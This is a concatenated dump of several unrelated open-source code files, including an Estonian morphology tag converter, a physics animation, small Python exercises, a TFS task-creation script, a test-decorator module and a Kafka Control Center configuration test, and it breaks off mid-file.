= {}\n\t\tg_d_sentence['clauseTokens'][1] = []\n\t\tg_d_sentence['clauseParent'][1] = 0\n\t\treturn 1\n\ndef parseTokenLineToDict(line):\n\t#siia lisada range stringi formaadi check ja vastav info stdERRORisse\n\t#Seoses Seos+s //_H_ Sg Ine, // Seose+s //_H_ Sg Ine, // Seoses+0 //_H_ Sg Nom, // seos+s //_S_ Sg Ine, // seoses+0 //_K_ //\n\tglobal g_input_line_nr\n\tdict={}\n\terrors = []\n\tline=line.strip()\n\t#ignore empty lines\n\t#print (line)\n\tif line != '':\n\t\tresult = re.match('(^[^\\s+]+)', line)\n\t\tdict['token'] = result.group(0)\n\t\tresult = re.split('\\s//\\s*', line)\n\t\t#print (result);\n\t\tif len(result)>1:\n\t\t\tresult2 =re.split('\\s+', result[0])\n\t\t\tif len(result2)==2:\n\t\t\t\t#print (result2)\n\t\t\t\tdict['token'] = result2[0].strip()\n\t\t\t\tstr = result2[1].strip()\n\n\t\t\t\tdict['analys']={}\n\t\t\t\tdict['analys']['lemma']=[]\n\t\t\t\tdict['analys']['case']=[]\n\t\t\t\tdict['analys']['morf']=[]\n\t\t\t\tdict['analys']['pos']=[]\n\t\t\t\tdict['analys']['function']=[]\n\t\t\t\tdict['analys']['relation']=[]\n\n\n\t\t\t\tresult = re.findall('\\s\\s\\s\\s.+\\s\\/\\/.+\\/\\/', line)\n\t\t\t\tif len(result) < 1:\n\t\t\t\t\terrors.append((bColors.pattern_red % ('\\tUnrecognized format on line %d: ' % g_input_line_nr)) + line)\n\t\t\t\t#print (result\n\t\t\t\tfor i,v in enumerate(result):\n\t\t\t\t\tres = re.split(' //', v)\n\t\t\t\t\tdict['analys']['pos'].append('')\n\t\t\t\t\tlemmacase = re.split('\\+', res[0].strip())\n\t\t\t\t\t# print (lemmacase)\n\t\t\t\t\tdict['analys']['lemma'].append(lemmacase[0].strip())\n\t\t\t\t\tif (len(lemmacase)>1):\n\t\t\t\t\t\tdict['analys']['case'].append(lemmacase[1].strip())\n\t\t\t\t\telse:\n\t\t\t\t\t\tdict['analys']['case'].append('')\n\t\t\t\t\tdict['analys']['morf'].append(res[1].strip().replace(',',''))\n\t\t\t\t\tdict['analys']['function'].append('')\n\t\t\t\t\tdict['analys']['relation'].append('')\n\n\t\t\telse:\n\t\t\t\tdict['analys'] = {}\n\t\t\t\tdict['analys']['lemma'] = []\n\t\t\t\tdict['analys']['case'] = []\n\t\t\t\tdict['analys']['morf'] = []\n\t\t\t\tdict['analys']['pos'] = []\n\t\t\t\tdict['analys']['function'] = []\n\t\t\t\tdict['analys']['relation'] = []\n\t\t\t\tdict['analys']['function'].append('')\n\t\t\t\tdict['analys']['relation'].append('')\n\t\t\t\tdict['analys']['pos'].append('')\n\t\t\t\tdict['analys']['lemma'].append('ERROR!!! '+line)\n\t\t\t\tdict['analys']['case'].append('')\n\t\t\t\tdict['analys']['morf'].append(line)\n\t\t\t\terrors.append((bColors.pattern_red % ('\\tUnrecognized format on line %d: ' % g_input_line_nr)) + line)\n\n\n\t\telse:\n\t\t\tdict['analys'] = {}\n\t\t\tdict['analys']['lemma'] = []\n\t\t\tdict['analys']['case'] = []\n\t\t\tdict['analys']['morf'] = []\n\t\t\tdict['analys']['pos'] = []\n\t\t\tdict['analys']['function'] = []\n\t\t\tdict['analys']['relation'] = []\n\t\t\tdict['analys']['lemma'].append('ERROR!!! '+line)\n\t\t\tdict['analys']['case'].append('')\n\t\t\tdict['analys']['function'].append('')\n\t\t\tdict['analys']['relation'].append('')\n\t\t\tdict['analys']['pos'].append('')\n\t\t\tdict['analys']['morf'].append(line)\n\t\t\terrors.append((bColors.pattern_red % ('\\tUnrecognized format on line %d: ' % g_input_line_nr)) + line)\n\tif len(errors):\n\t\teprint()\n\tfor error in errors:\n\t\teprint (bColors.pattern_red % ('\\t%s'%error))\n\t\t#pp.pprint(dict)\n\n\treturn (dict)\n\ndef makeDictFromArray(aSentence, i=None):\n\t# sentence_dict['lines'][lineid]['type'] == 'token'\n\t# dict['analys']={}\n\t# dict['analys']['lemma']=[]\n\t# dict['analys']['case']=[]\n\t# dict['analys']['morf']=[]\n\t# dict['analys']['lemma'].append('ERROR!!! '+line)\n\t# dict['analys']['case'].append('')\n\t# dict['analys']['morf'].append(line)\n\n\t#\n\t#Õigupoolest õigu_poolest+0 //_D_ //\n\t#tuli tule+i //_V_ Pers Prt Ind Sg3 Aff, //\n\t#kell kell+0 //_S_ Sg Nom, //\n\t#12:08 12:08+0 //_N_ ?, //\n\t#ka ka+0 //_D_ //\n\t#teade teade+0 //_S_ Sg Nom, //\n\t#, , //_Z_ //\n\t#\n\t#et et+0 //_J_ //\n\t#m-parkimine m-parkimine+0 //_S_ Sg Nom, //\n\t#ei ei+0 //_V_ Neg, //\n\t#toimi toimi+0 //_V_ Pers Prs Ind Neg, //\n\t#... ... //_Z_ //\n\t#\n\t#aga aga+0 //_J_ //\n\t#selleks see+ks //_P_ Sg Tra, //\n\t#ajaks aeg+ks //_S_ Sg Tra, //\n\t#teadsin tead+sin //_V_ Pers Prt Ind Sg1 Aff, //\n\t#ma mina+0 //_P_ Sg Nom, //\n\t#seda see+da //_P_ Sg Par, //\n\t#isegi isegi+0 //_D_ //\n\t#. . //_Z_ //\n\t#\n\n\tglobal g_d_sentence\n\tglobal g_input_line_nr\n\n\n\tg_d_sentence = {'lines':{}}\n\tline_id = 0\n\t#g_token_id = 0\n\n\tlevel = 1\n\n\n\tclause_id = new_clause_id()\n\n\tparent_clause = g_d_sentence['clauseParent'][clause_id]\n\t#g_d_sentence['clauseParent'][g_clause_id] = parent_clause\n\n\n\ttag_line_pattern = '^<(.+)>$'\n\n\t#token_line_pattern = '^(.+)\\s\\s\\s\\s((.+) //(.+) //\\s*)+$'\n\tline_id = 0\n\n\tfor s in aSentence:\n\n\t\t# print (s)\n\t\tline_id += 1\n\t\tmatch_tag = re.match(tag_line_pattern, s)\n\t\t#match_tokenline = re.match(token_line_pattern, s)\n\n\t\tif match_tag:\n\n\t\t\t#print (match_tag.groups())\n\t\t\ttag = s\n\t\t\tif match_tag.group(1) == 'kindel_piir/':\n\t\t\t\t#parent sama\n\t\t\t\t#clause uus\n\t\t\t\tclause_id = new_clause_id()\n\t\t\t\tg_d_sentence['clauseParent'][clause_id] = parent_clause\n\t\t\t\tg_d_sentence['lines'][line_id] = { 'type':'tag', 'line_id':line_id, 'tag': tag, 'level' : level}\n\n\t\t\telif match_tag.group(1) == 'kiil':\n\t\t\t\t#parent eelmine clause\n\t\t\t\t#clause uus\n\t\t\t\tparent_clause = clause_id\n\t\t\t\tclause_id = new_clause_id()\n\t\t\t\tg_d_sentence['clauseParent'][clause_id] = parent_clause\n\t\t\t\tlevel += 1\n\t\t\t\tg_d_sentence['lines'][line_id] = { 'type':'tag', 'line_id':line_id, 'tag': tag, 'level' : level}\n\n\n\t\t\telif match_tag.group(1) == '/kiil':\n\t\t\t\t# parentclause parent\n\t\t\t\t# clause eelmine clause\n\t\t\t\tg_d_sentence['lines'][line_id] = { 'type':'tag', 'line_id':line_id, 'tag': tag, 'level' : level}\n\t\t\t\tlevel -= 1\n\t\t\t\tclause_id = g_d_sentence['clauseParent'][clause_id]\n\t\t\t\tparent_clause = g_d_sentence['clauseParent'][clause_id]\n\n\t\t\t#print (clause_id, parent_clause, '-'*4*g_d_sentence['lines'][line_id]['level'], s)\n\n\t\telse:\n\t\t\t#print (clause_id, parent_clause, '-'*4*level, s)\n\n\t\t\tinfo = parseTokenLineToDict(s)\n\t\t\tg_d_sentence['lines'][line_id] = { 'type':'token', 'line_id':line_id, 'token': s, 'clause_id':clause_id, 'level' : level, 'info':info}\n\t\t\tg_d_sentence['clauseTokens'][clause_id].append(line_id)\n\t\t\t#print (info)\n\n\t\ndef translate(f_input, f_out):\n\t#global variables\n\tglobal g_d_sentence\n\tglobal g_input_line_nr\n\tglobal missing_morf\n\tglobal global_conf\n\tflags = global_conf['conf']['flags']\n\n\ttag_line_pattern = '^.?<.*>$'\n\tmissing_morf = {}\n\ti = 0\n\tg_input_line_nr = 0\n\tarr_sentence = []\n\tin_sentence = False\n\teprint()\n\twith f_input as fp:\n\t\tfor line in fp:\n\t\t\tg_input_line_nr += 1\n\t\t\tline = line.strip()\n\t\t\tif line == '':\n\t\t\t\tcontinue\n\t\t\telif '1' in flags:\n\t\t\t\t\n\t\t\t\tmatch_tag = re.match(tag_line_pattern, line)\n\t\t\t\tif not match_tag:\n\t\t\t\t\tarr_sentence = []\n\t\t\t\t\tarr_sentence.append(line)\n\t\t\t\t\tmakeDictFromArray(arr_sentence, i)\n\t\t\t\t\t#sys.stderr.write('%d..' % g_input_line_nr)\n\t\t\t\t\t#sys.stderr.flush()\n\t\t\t\t\tsentence = transform_with_weight(g_d_sentence, dict)\n\t\t\t\t\tf_out.write(construct_inforem_sentence(g_d_sentence, i))\n\t\t\t\t\tarr_sentence = []\n\n\t\t\telif line == '' and in_sentence == False:\n\t\t\t\ti += 1\n\t\t\t\tin_sentence = True\n\t\n\t\t\telif line == '' and in_sentence == True:\n\t\n\t\t\t\tin_sentence = False\n\t\t\t\tsys.stderr.write('%d..' % i)\n\t\t\t\tsys.stderr.flush()\n\t\n\t\t\t\tmakeDictFromArray(arr_sentence, i)\n\t\n\t\t\t\t#print (arr_sentence)\n\t\t\t\tarr_sentence = []\n\t\n\t\t\t\tsentence = transform_with_weight(g_d_sentence, dict)\n\t\t\t\tf_out.write(construct_inforem_sentence(g_d_sentence, i))\n\t\n\t\n\t\t\telif in_sentence:\n\t\t\t\t#print (line)\n\t\t\t\tarr_sentence.append(line)\n\tif missing_morf:\n\t\teprint()\n\t\teprint (bColors.pattern_blue % '\\tMissing morf tags:')\n\tfor morf in sorted(missing_morf):\n\t\teprint (bColors.pattern_blue % ('\\t\\t%s'%morf))\n\t\n\treturn 1\n\n\ndef read_local_conf(conffilename):\n\tglobal global_conf\n\ttry:\n\t\tf_tsv_conf = codecs.open(conffilename, \"r\", \"utf-8\")\n\t\tif 'v' in global_conf['conf']['verbose']:\n\t\t\teprint(bColors.pattern_bold % ('Reading conf from %s' % conffilename))\n\texcept IOError:\n\t\teprint(bColors.pattern_red % ('Cannot open %s' % conffilename))\n\t\treturn 0\n\t\t\n\tdict_rows_count=0\n\twith f_tsv_conf as tsv:\n\t\tfor line in tsv:\n\t\t\tline = line.strip()\n\t\t\trow = line.split(\"\\t\")\n\t\n\n\t\t\tif row[0][:1]=='#':\n\t\t\t\tcontinue\n\t\t\telif row[0][:1]=='':\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tparams = row[0].split('.')\n\t\t\t\tif params[0] == 'dict_weight' and len(params)==2 and len(row)>1:\n\t\t\t\t\tvalue = row[1].strip()\n\t\t\t\t\tif params[1] in global_conf['dict_weight']:\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tglobal_conf['dict_weight'][params[1]]\t= int(value)\n\t\t\t\t\t\texcept ValueError:\n\t\t\t\t\t\t\teprint(bColors.pattern_red % ('\\tInvalid \\'dict_weight value\\' for \\'%s\\' in configuration file. \\'%s\\' should be int.'%(params[1], value)))\n\t\t\t\t\t\t\t\n\t\t\t\telif params[0] == 'conf' and len(params)==2 and len(row)>1:\n\t\t\t\t\tvalue = row[1].strip()\n\t\t\t\t\tif params[1] == 'output_extension' and len(value):\n\t\t\t\t\t\t global_conf['conf']['output_extension']\t= value\n\t\t\t\t\telif params[1] == 'output_folder' and len(value):\n\t\t\t\t\t\tglobal_conf['conf']['output_folder']\t = value\n\t\t\t\t\telif params[1] == 'default_dictionary' and len(value):\n\t\t\t\t\t\tglobal_conf['conf']['default_dictionary']\t = value\n\t\t\t\t\telif params[1] == 'additional_dictionary' and len(value):\n\t\t\t\t\t\tglobal_conf['conf']['additional_dictionary']\t = value\n\treturn 1\n\n##################################\n#\n#################################\nimport getopt\ndef usage():\n\t\n\tprint (\"Usage ....\")\n\ndef main():\n\n\toptions = {}\n\ttry:\n\t\topts, args = getopt.getopt(sys.argv[1:], \"h1c:d:a:f:e:\", [\"help\", \"1_line_mode\", \"dictionary=\", \"dictionary_additional=\"])\n\t\t\n\t\t#print (opts)\n\texcept getopt.GetoptError as err:\n\t\t# print help information and exit:\n\t\teprint (\"option is not recognized\")\n\t\tusage()\n\t\tsys.exit(2)\n\toutput = None\n\tverbose = False\n\tfor o, a in opts:\n\t\tif o == \"-v\":\n\t\t\tverbose = True\n\t\telif o in (\"-h\", \"--help\"):\n\t\t\tusage()\n\t\t\tsys.exit()\n\t\telif o in (\"-c\"):\n\t\t\toptions['local_conf'] = a\n\t\telif o in (\"-d\"):\n\t\t\toptions['default_dictionary'] = a\n\t\telif o in (\"-a\"):\n\t\t\toptions['additional_dictionary'] = a\n\t\telif o in (\"-f\"):\n\t\t\toptions['output_folder'] = a\n\t\telif o in (\"-e\"):\n\t\t\toptions['output_extension'] = a\n\t\telif o in (\"-1\"):\n\t\t\toptions['1'] = '1'\n\t\t\t\n\t\t\t\n\t\t\t\n\t\telse:\n\t\t\tassert False, (\"unhandled option %s\"%o)\n\t\n\tinput_files = args\n\toptions['input_files'] = input_files\n\treturn options\n\t\n\n\n################################\n# START\n##############################\n\n\n\n#parsing dictionary\n\t\t\nscript_name = (os.path.realpath(__file__))\nscript_dir = os.path.dirname(script_name)\n\n\n\n\n\n\nglobal_conf = {}\n\n\n#DEfault values\nglobal_conf['dict_weight'] = {\n\t'lemma+' : 100\n\t, 'lemma-' : 100\n\t, 'prev_lemma+' : 70\n\t, 'prev_lemma-' : 70\n\t, 'next_lemma+' : 70\n\t, 'next_lemma-' : 70\n\t, 'clause_lemma+' : 50\n\t, 'clause_lemma-' : 50\n\t\n\t, 'prev_morf+' : 65\n\t, 'prev_morf-' : 65\n\t, 'next_morf+' : 65\n\t, 'next_morf-' : 65\n\t, 'clause_morf+' : 50\n\t, 'clause_morf-' : 50\n\n\t, 'gramcat+' : 25\n\t, 'gramcat-' : 25\n\t, 'prev_gramcat+' : 24\n\t, 'prev_gramcat-' : 24\n\t, 'next_gramcat+' : 24\n\t, 'next_gramcat-' : 24\n\t, 'clause_gramcat+' : 20\n\t, 'clause_gramcat-' : 20\n\t\n\t\n\t}\n\n\n\n\nglobal_conf['conf'] = {}\n\nglobal_conf['conf']['output_extension'] = 'mrf.inforem'\nglobal_conf['conf']['output_folder'] = '.'\n\nglobal_conf['conf']['default_dictionary'] = script_dir+'/dictionaries/giella2cg.tab'\nglobal_conf['conf']['default_conffile'] = script_dir + '/conf/conf.tab'\nglobal_conf['conf']['verbose'] = 'v'\nglobal_conf['conf']['flags'] = ''\n\ncommandline_options = {}\n\nif __name__ == \"__main__\":\n\tcommandline_options = main()\n\nflags = ''\n\n\n\nif 'local_conf' in commandline_options:\n\tglobal_conf['conf']['default_conffile'] = commandline_options['local_conf']\n\t\n\n\n\n\nif '1' in commandline_options:\n\tglobal_conf['conf']['flags'] += '1'\n\t#ei lobise nii palju\n\tglobal_conf['conf']['verbose'] = ''\n#override conf with conffile\nread_local_conf(global_conf['conf']['default_conffile'])\n\nif 'output_folder' in commandline_options:\n\tglobal_conf['conf']['output_folder'] = commandline_options['output_folder']\n\nmake_sure_path_exists(global_conf['conf']['output_folder'])\n\n\nif 'output_extension' in commandline_options:\n\tglobal_conf['conf']['output_extension'] = commandline_options['output_extension']\n\n\nif 'default_dictionary' in commandline_options:\n\tglobal_conf['conf']['default_dictionary'] = commandline_options['default_dictionary']\n\n\n#additional dictionary\nif 'additional_dictionary' in commandline_options:\n\tglobal_conf['conf']['additional_dictionary'] = commandline_options['additional_dictionary']\n\t\n\nif '1' in commandline_options and 'v' in global_conf['conf']['verbose']:\n\t\teprint('\\t%s\\t%s' % ('1-line mode', 'activated'))\n\t\t\n\t\t\ninputfiles = commandline_options['input_files']\n\n\n\nif 'v' in global_conf['conf']['verbose']:\n\teprint()\n\teprint(bColors.pattern_bold % 'morf2morf.py is running with the following params:')\n\teprint('\\t%s\\t\\t%s' % ('local_conffile', global_conf['conf']['default_conffile']))\n\teprint('\\t%s\\t\\t%s' % ('output_folder', global_conf['conf']['output_folder']))\n\teprint('\\t%s\\t\\t%s' % ('output_extension', global_conf['conf']['output_extension']))\n\teprint('\\t%s\\t\\t%s' % ('default_dictionary', global_conf['conf']['default_dictionary']))\n\tif 'additional_dictionary' in global_conf['conf']:\n\t\teprint('\\t%s\\t\\t%s' % ('additional_dictionary', global_conf['conf']['additional_dictionary']))\n\tif len(inputfiles):\n\t\teprint('\\t%s' % 'Input files:')\n\t\tfor ifile in inputfiles:\n\t\t\teprint('\\t\\t%s' % ifile)\n\teprint()\n\n\n\n#parsing dictionary\ndict = read_parse_dict(global_conf['conf']['default_dictionary'])\n\n#additional dictionary\nif 'additional_dictionary' in global_conf['conf']:\n\tdict = read_parse_dict(global_conf['conf']['additional_dictionary'], dict)\n\n\n#global variables\nglobal g_d_sentence\nglobal g_input_line_nr\nglobal missing_morf\n\n\nfor input in inputfiles:\n\ttry:\n\t\tf_input = codecs.open(input, \"r\", \"utf-8\")\n\t\toutput = global_conf['conf']['output_folder'] +'/' + path_leaf(input) + '.' + global_conf['conf']['output_extension']\n\texcept IOError:\n\t\teprint(bColors.pattern_red % ('Cannot open ' + input))\n\t\tcontinue\n\teprint()\n\teprint(bColors.pattern_bold % (\"%s -----> %s\" % (input, output)))\n\t# open output file\n\ttry:\n\t\tf_out = codecs.open(output, \"w\", \"utf-8\")\n\t\t\n\t\n\texcept IOError:\n\t\teprint(bColors.pattern_red % ('Cannot open ' + output))\n\t\tcontinue\n\t\t\n\ttranslate(f_input, f_out)\n\n\tf_out.close()\n\tf_input.close()\n\t\nif not len(inputfiles) :\n\tif isPythonVersion(2.7):\n\t\treload(sys)\n\t\tsys.setdefaultencoding('utf-8')\n\ttranslate(sys.stdin, sys.stdout)\n\n\n\t\neprint()\nexit()\n","repo_name":"EstSyntax/SAMEST-morfoloogilised-kategooriad","sub_path":"morf2morf/morf2morf.py","file_name":"morf2morf.py","file_ext":"py","file_size_in_byte":29565,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"4352532322","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.offsetbox import OffsetImage, AnnotationBbox\n\n\"Animation of the trajectory of a particle (newtonian_dynamics.f90)\"\n\ndata_type = np.dtype([(\"t\", np.float32),\\\n (\"x\", np.float32),\\\n (\"y\", np.float32),\\\n (\"z\", np.float32),\\\n (\"vx\", np.float32),\\\n (\"vy\", np.float32),\\\n (\"vz\", np.float32)])\ndata = np.fromfile(\"out1.dat\", dtype=data_type)\n\n\nbim = plt.imread(\"assets/man.png\") # background image\noi = OffsetImage(plt.imread(\"assets/ball.png\"),zoom=0.5) # image for points\n\nfor i in range(0,data[\"t\"].shape[0],2):\n # Background still image\n plt.imshow(bim, origin=\"upper\", extent=[-2,-1.3,0,2])\n\n plt.scatter([data[\"x\"][i]],[data[\"y\"][i]])\n\n # Subtitutes points by images\n ab = AnnotationBbox(oi, (data[\"x\"][i], data[\"y\"][i]), frameon=False)\n plt.gca().add_artist(ab)\n\n\n # Animation settings\n plt.pause(0.001) # controls frames per second\n plt.clf() # clears figure for next frame\n plt.cla() # clears artist for next frame\n plt.xlim(-2,2) # scene x range\n plt.ylim(-2,2) # scene y range\n #plt.axis(\"off\")\n\nplt.show()\n","repo_name":"gandreoliva/physics_prog_collection","sub_path":"exercises/newtonian_dynamics_animate_plt.py","file_name":"newtonian_dynamics_animate_plt.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"20552729074","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n###\n# Name: Jack Savage Student ID: 2295072 Email: jsavage@chapman.edu Course: \n# PHYS220/MATH220/CPSC220 Fall 2018 Assignment: CW03\n###\n\n\"\"\"This module reads the input of a number and returns an array of the first n \nFibonacci numbers in a list \"\"\"\n\n# return a list containing the fibonacci series up to n.\ndef fibonacci(n):\n '''Fibonacci function\n Args:\n n: number of fibonacci numbers to calculate\n Returns:\n List containing first n fibonacci numbers\n Raises:\n Custom Exception 'Exception':\n Thrown if n < 1\n Instructs user to enter value larger than 0\n TypeError:\n Thrown by non-integer value of n\n '''\n if n < 1:\n raise Exception('Please enter a value larger than 0')\n \n result = []\n x = 0\n y = 1\n z = 1\n \n #try:\n for i in range(n):\n z = x + y\n result.append(z)\n y = x\n x = z\n return result \n\n","repo_name":"chapman-phys220-2018f/cw03-thepenguins","sub_path":"sequences.py","file_name":"sequences.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"37054523381","text":"#!/usr/bin/env python\n\"\"\"Django's command-line utility for administrative tasks.\"\"\"\nimport os\nimport re\nimport sys\n\ndef load_env():\n try:\n with open('./envs/.env') as f:\n content = f.read()\n except IOError:\n content = ''\n for line in content.splitlines():\n m = re.match(r'\\A([A-Za-z_0-9]+)=(.*)\\Z', line)\n if m:\n key, val = m.group(1), m.group(2)\n os.environ.setdefault(key, val)\n\n\ndef main():\n \"\"\"Run administrative tasks.\"\"\"\n os.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"petstagram.settings\")\n try:\n from django.core.management import execute_from_command_line\n except ImportError as exc:\n raise ImportError(\n \"Couldn't import Django. Are you sure it's installed and \"\n \"available on your PYTHONPATH environment variable? Did you \"\n \"forget to activate a virtual environment?\"\n ) from exc\n execute_from_command_line(sys.argv)\n\n\nif __name__ == \"__main__\":\n load_env()\n main()\n","repo_name":"Minkov/petstagram","sub_path":"petstagram/manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"76"} +{"seq_id":"25669087555","text":"# from functools import wraps\nimport sys\nfrom ._levels import Levels\n\n# test_method_name = 'test_call'\n\"\"\"class test(object):\n def __init__ (self, *args, **kwargs):\n # store arguments passed to the decorator\n self.args = args\n self.kwargs = kwargs\n\n def __call__(self, func):\n def test_call(*args, **kwargs):\n #the 'self' for a method function is passed as args[0]\n slf = args[0]\n\n # replace and store the attributes\n saved = {}\n for k,v in self.kwargs.items():\n if hasattr(slf, k):\n saved[k] = getattr(slf,k)\n setattr(slf, k, v)\n\n # call the method\n ret = func(*args, **kwargs)\n\n #put things back\n for k,v in saved.items():\n setattr(slf, k, v)\n\n return ret\n test_call.__doc__ = func.__doc__\n return test_call \"\"\"\n\nTEST_METHOD_NAME = \"test_alpha_in\"\n\n\ndef test(\n mandatory: bool = False,\n save: bool = False,\n description: str = None,\n stop: bool = True,\n disable: bool = False,\n level: Levels = Levels.MEDIUM,\n):\n def test_alpha_in(func):\n def test_wrapper(*args, **kwargs):\n TestClass = args[0]\n TestClass.output = None\n\n output = func(*args, **kwargs)\n \n if TestClass.output is not None:\n # When using assertions\n TestClass.outputs[func.__name__] = TestClass.output\n return TestClass.output\n else:\n # output is not None only when using return\n TestClass.outputs[func.__name__] = output\n return output\n\n if hasattr(func, \"__name__\"):\n test_wrapper.__name__ = func.__name__\n parameters = {\n \"save\": save,\n \"description\": description,\n \"stop\": stop,\n \"disable\": disable,\n \"level\": level,\n \"func\": func,\n }\n test_wrapper.__dict__ = parameters\n else:\n pass\n\n return test_wrapper\n\n return test_alpha_in\n\n\nsave_method_name = \"save_method_result\"\n\n\ndef save(func):\n def save_method_result(*args, **kwargs):\n get_return, get_name = False, False\n new_kwargs = {}\n args = list(args)\n\n for kw in kwargs.keys():\n if kw == \"get_return\":\n get_return = True\n elif kw == \"get_name\":\n get_name = True\n else:\n new_kwargs[kw] = kwargs[kw]\n\n return_save = AlphaSave.load(func.__name__)\n\n if get_return:\n return func(*args, **new_kwargs)\n elif get_name:\n return func.__name__\n else:\n return func(*args, **new_kwargs) == return_save\n\n return save_method_result\n","repo_name":"Tanguybes/alphaz","sub_path":"models/tests/_wrappers.py","file_name":"_wrappers.py","file_ext":"py","file_size_in_byte":2893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"37008430092","text":"def remove_accents(text):\n accents = {\n 'a': ['à', 'á', 'â', 'ã', 'ä', 'å', 'æ'],\n 'c': ['ç'],\n 'e': ['è', 'é', 'ê', 'ë', 'æ'],\n 'i': ['ì', 'í', 'î', 'ï'],\n 'n': ['ñ'],\n 'o': ['ò', 'ó', 'ô', 'õ', 'ö', 'ø'],\n 's': ['ß'],\n 'u': ['ù', 'ú', 'û', 'ü'],\n 'y': ['ÿ'],\n }\n\n for character, accents_list in accents.items():\n for accent in accents_list:\n text = text.replace(accent, character)\n\n return text\n\ndef main():\n text = \"La 16e Japan Expo (2-5 juillet), où 250 000 visiteurs sont attendus, le confirme : la France est — aussi — un pays de mangas. Plus de 1 500 titres sont publiés chaque année dans l’Hexagone, soit autant que les albums franco-belges. La très grande majorité de ces recueils au format poche est composée de titres préalablement parus au Japon dont les droits ont été achetés. Une sujétion au made in Japan inéluctable ? Pas si sûr, car une tendance s’amorce chez les éditeurs français : la création ex nihilo de séries, commandées directement auprès d’auteurs nippons.\"\n\n text_ascii = remove_accents(text)\n print(text_ascii)\n\nif __name__ == '__main__':\n main()\n","repo_name":"HanyAyad/Python-Practice","sub_path":"Assignment5/accent removal.py","file_name":"accent removal.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"30229818388","text":"'''\n\n1. Download TFS power tools\nhttps://marketplace.visualstudio.com/items?itemName=TFSPowerToolsTeam.MicrosoftVisualStudioTeamFoundationServer2015Power\n\n2. Running the command\n i. Go to the TFS mapped path. Ex: D:\\TFS_WORKING_FOLDER\n ii. Execute the command \n Ex: tfpt workitem /new Project1\\Task /fields:\"Title=New;Area Path= myArea\\path;Assigned To= XXXXXX\"\n On success, message \"Work item 385356 created.\" is displayed.\n\n'''\n\nimport os\n\ndef CreateTask(title, assigned_to, description):\n \n command = 'tfpt workitem /new Project1\\Task /fields:\"Area Path= myArea\\path;Title=' + title +';'\n command += 'Assigned To='+ assigned_to + ';'\n command += 'Iteration Path= Iter\\Path;'\n command += 'Description=' + description \n \n #NOTE: Update the project path, area path and iteration path according to your project, before executing this script !!!\n \n print ('Command executed: ' + command)\n path = \"D:\\TFS_WORKING_FOLDER\"\n os.chdir(path)\n os.system(command) \n #Below message will be seen after command execution \"Work item 385356 created.\"\n\n\nCreateTask('title of task', 'myself', 'description of task')\n","repo_name":"manjunathmayya/youtube_videos","sub_path":"tfs_task_creation/tfs_task_creation.py","file_name":"tfs_task_creation.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"76"} +{"seq_id":"24999985091","text":"def function(array):\n \n urray=[]\n i=0\n \n while i < len(array):\n check=True\n j=0\n while j< len(array):\n if (array[i] == array[j]) and (i!=j):\n check=False\n break\n j=j+1\n if check :\n urray.append(array[i])\n i=i+1\n \n for i in urray:\n print (i)\n \n \nfunction([2,3,2,5,8,1,9,8])","repo_name":"student223708/year1","sub_path":"University/6/19.py","file_name":"19.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"5451443049","text":"import unittest\nfrom unittest.mock import patch\nfrom jinja2 import Environment, FileSystemLoader\nimport confluent.docker_utils.dub as dub\nimport os\nimport random\n\n# complete set\nbasic_props = dict(\n CONTROL_CENTER_BOOTSTRAP_SERVERS=\"bootstrap.servers\",\n CONTROL_CENTER_ZOOKEEPER_CONNECT=\"zookeeper.connect\",\n CONTROL_CENTER_DATA_DIR=\"confluent.controlcenter.data.dir\"\n)\n\n# complete set\nrf_props = dict(\n CONTROL_CENTER_INTERNAL_TOPICS_REPLICATION=\"confluent.controlcenter.internal.topics.replication\",\n CONTROL_CENTER_COMMAND_TOPIC_REPLICATION=\"confluent.controlcenter.command.topic.replication\",\n CONTROL_CENTER_MONITORING_INTERCEPTOR_TOPIC_REPLICATION=\"confluent.monitoring.interceptor.topic.replication\",\n CONTROL_CENTER_METRICS_TOPIC_REPLICATION=\"confluent.metrics.topic.replication\",\n)\n\n# complete set\nrequired_props = {**basic_props, **rf_props}\n\n# incomplete set\nmonitoring_props = dict(\n CONTROL_CENTER_MONITORING_INTERCEPTOR_TOPIC=\"confluent.monitoring.interceptor.topic\",\n CONTROL_CENTER_MONITORING_INTERCEPTOR_TOPIC_PARTITIONS=\"confluent.monitoring.interceptor.topic.partitions\"\n)\n\n# incomplete set\ncontrol_center_metrics_props = dict(\n CONTROL_CENTER_METRICS_TOPIC=\"confluent.metrics.topic\",\n CONTROL_CENTER_METRICS_TOPIC_RETENTION_MS=\"confluent.metrics.topic.retention.ms\"\n)\n\n# incomplete set\nconfluent_metrics_props = dict(\n CONFLUENT_METRICS_TOPIC=\"confluent.metrics.topic\",\n CONFLUENT_METRICS_TOPIC_REPLICATION=\"confluent.metrics.topic.replication\",\n CONFLUENT_METRICS_TOPIC_RETENTION_MS=\"confluent.metrics.topic.retention.ms\",\n)\n\n# incomplete set\nc3_optional_props = dict(\n CONTROL_CENTER_ID=\"confluent.controlcenter.id\",\n CONTROL_CENTER_NAME=\"confluent.controlcenter.name\",\n)\n\n# incomplete set\nmetadata_props = dict(\n CONFLUENT_METADATA_BOOTSTRAP_SERVER_URLS=\"confluent.metadata.bootstrap.server.urls\",\n CONFLUENT_METADATA_CLUSTER_REGISTRY_ENABLE=\"confluent.metadata.cluster.registry.enable\",\n)\n\n# incomplete 